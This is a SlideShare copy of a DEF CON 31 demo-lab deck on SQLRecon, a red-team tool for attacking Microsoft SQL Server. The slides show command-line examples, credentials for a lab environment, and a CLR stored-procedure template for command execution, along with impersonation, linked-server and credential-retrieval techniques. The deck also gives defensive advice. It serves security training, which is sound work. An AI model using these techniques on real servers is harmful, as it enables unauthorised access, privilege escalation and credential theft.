SlideShare a Scribd company logo

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

Sanjiv Kawa
Sanjiv Kawa

Video: https://youtu.be/LsYSePobFWA Conference: DEF CON 31 Presentation Title: Abusing Microsoft SQL Server with SQLRecon Presenter: Sanjiv Kawa

Technology
1 of 51
Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
2 Sanjiv Kawa Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator - Post-Exploitation Tooling Developer - github.com/xforcered/SQLRecon Intro @sanjivkawa github.com/skahwah IBM X-Force Red
3 Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min Agenda
4 Get Involved! Hack with me - Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases - Spin up a Windows VM - Connect to SSID SQLRecon-Lab, don’t worry, it’s safe - Connection details will be provided before demo’s
5 Microsoft SQL Server Overview
6 Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory MS SQL Server Overview
7 Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
8 SQLRecon Overview
9 What’s Currently Available? A good amount of offensive MS SQL Server tools already exist
10 How Did This Research Come About? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
11 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
12 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
13 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
14 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
15 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
16 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
17 Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
18 Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
19 Demo Time
20 Get Involved! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything
21 Get Involved! WiFi SSID: SQLRecon-Lab Password: DefconIsCancelled! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything. Lab (kawalabs.local) DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
22 Demo 1 Evaluating the current user’s permissions
23 Demo 1
24 Demo 2 Locating MS SQL Servers in AD via SPNs
25 Demo 2
26 Demo 3 Enumerating Azure MS SQL Server Database
27 Demo 3
28 Demo 4 Unprivileged UNC Path Injection
29 Demo 4
30 Demo 5 Operational Security and Execution Guardrails
31 Demo 5
32 Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
33 Demo 6 Privilege Escalation: Abusing Impersonation
34 Demo 6
35 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
36 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
37 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
38 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
39 Demo 7
40 Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
41 Demo 8 Credential Abuse: ADSI Double-Link Boomerang
42 Demo 8
43 Demo 9 SCCM / MECM Enumeration
44 Demo 9
45 Demo 10 Privilege Escalation: MECM / SCCM
46 Demo 10
47 Defensive Considerations
48 Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
49 Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server best practices! - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
50 Questions or Comments? Thank You @xforcered github.com/xforcered/SQLRecon IBM X-Force Red github.com/skahwah @sanjivkawa
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

Recommended

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Business Continuity Plan PowerPoint Presentation Slides
Business Continuity Plan PowerPoint Presentation Slides Business Continuity Plan PowerPoint Presentation Slides
Business Continuity Plan PowerPoint Presentation Slides SlideTeam
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Harry McLaren
 
cybersecurity strategy planning in the banking sector
cybersecurity strategy planning in the banking sectorcybersecurity strategy planning in the banking sector
cybersecurity strategy planning in the banking sectorOlivier Busolini
 
Cyber security
Cyber securityCyber security
Cyber securityNimesh Gajjar
 
Cybersecurity in the Workplace is Everyone's Business
Cybersecurity in the Workplace is Everyone's Business Cybersecurity in the Workplace is Everyone's Business
Cybersecurity in the Workplace is Everyone's Business Symantec
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Proactive incident response
Proactive incident responseProactive incident response
Proactive incident responseBrian Honan
 

Recommended

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Business Continuity Plan PowerPoint Presentation Slides
Business Continuity Plan PowerPoint Presentation Slides Business Continuity Plan PowerPoint Presentation Slides
Business Continuity Plan PowerPoint Presentation Slides SlideTeam
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Harry McLaren
 
cybersecurity strategy planning in the banking sector
cybersecurity strategy planning in the banking sectorcybersecurity strategy planning in the banking sector
cybersecurity strategy planning in the banking sectorOlivier Busolini
 
Cyber security
Cyber securityCyber security
Cyber securityNimesh Gajjar
 
Cybersecurity in the Workplace is Everyone's Business
Cybersecurity in the Workplace is Everyone's Business Cybersecurity in the Workplace is Everyone's Business
Cybersecurity in the Workplace is Everyone's Business Symantec
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Proactive incident response
Proactive incident responseProactive incident response
Proactive incident responseBrian Honan
 
How To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesHow To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesSlideTeam
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalPriyanka Aash
 
Cybersecurity
CybersecurityCybersecurity
CybersecurityEdwin A. Opare
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Cristian Garcia G.
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanControlScan, Inc.
 
Cyber security
Cyber securityCyber security
Cyber securitymanoj duli
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK PhilharmonicMITRE ATT&CK
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
 
Board and Cyber Security
Board and Cyber SecurityBoard and Cyber Security
Board and Cyber SecurityLeon Fouche
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
 
Cyber Threat Simulation Training
Cyber Threat Simulation TrainingCyber Threat Simulation Training
Cyber Threat Simulation TrainingBryan Len
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCristian Garcia G.
 
How To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckHow To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckSlideTeam
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadCristian Garcia G.
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
Using the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modelingUsing the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modelingEric Jernigan MSIA, CISSP, CISM, CRISC
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 

More Related Content

What's hot

How To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesHow To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesSlideTeam
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalPriyanka Aash
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Cristian Garcia G.
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanControlScan, Inc.
 
Cyber security
Cyber securityCyber security
Cyber securitymanoj duli
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK PhilharmonicMITRE ATT&CK
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
 
Board and Cyber Security
Board and Cyber SecurityBoard and Cyber Security
Board and Cyber SecurityLeon Fouche
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
 
Cyber Threat Simulation Training
Cyber Threat Simulation TrainingCyber Threat Simulation Training
Cyber Threat Simulation TrainingBryan Len
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCristian Garcia G.
 
How To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckHow To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckSlideTeam
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadCristian Garcia G.
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 

What's hot (20)

How To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesHow To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation Slides
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formal
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
 
Cyber security
Cyber securityCyber security
Cyber security
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK Philharmonic
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference
 
Board and Cyber Security
Board and Cyber SecurityBoard and Cyber Security
Board and Cyber Security
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response Planning
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
Cyber Threat Simulation Training
Cyber Threat Simulation TrainingCyber Threat Simulation Training
Cyber Threat Simulation Training
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al Negocio
 
How To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckHow To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete Deck
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridad
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
Using the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modelingUsing the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modeling
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahksqlserver.co.il
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)webhostingguy
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconSanjiv Kawa
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdfmohamedhayballa1
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionFrederic Descamps
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionMark Broadbent
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityFrank Kim
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersTobias Koprowski
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemJames Avery
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon (20)

SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahk
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLRecon
 
Sql Sever Presentation.pptx
Sql Sever Presentation.pptxSql Sever Presentation.pptx
Sql Sever Presentation.pptx
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
 
SqlSa94
SqlSa94SqlSa94
SqlSa94
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET Ecosystem
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 

Recently uploaded

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
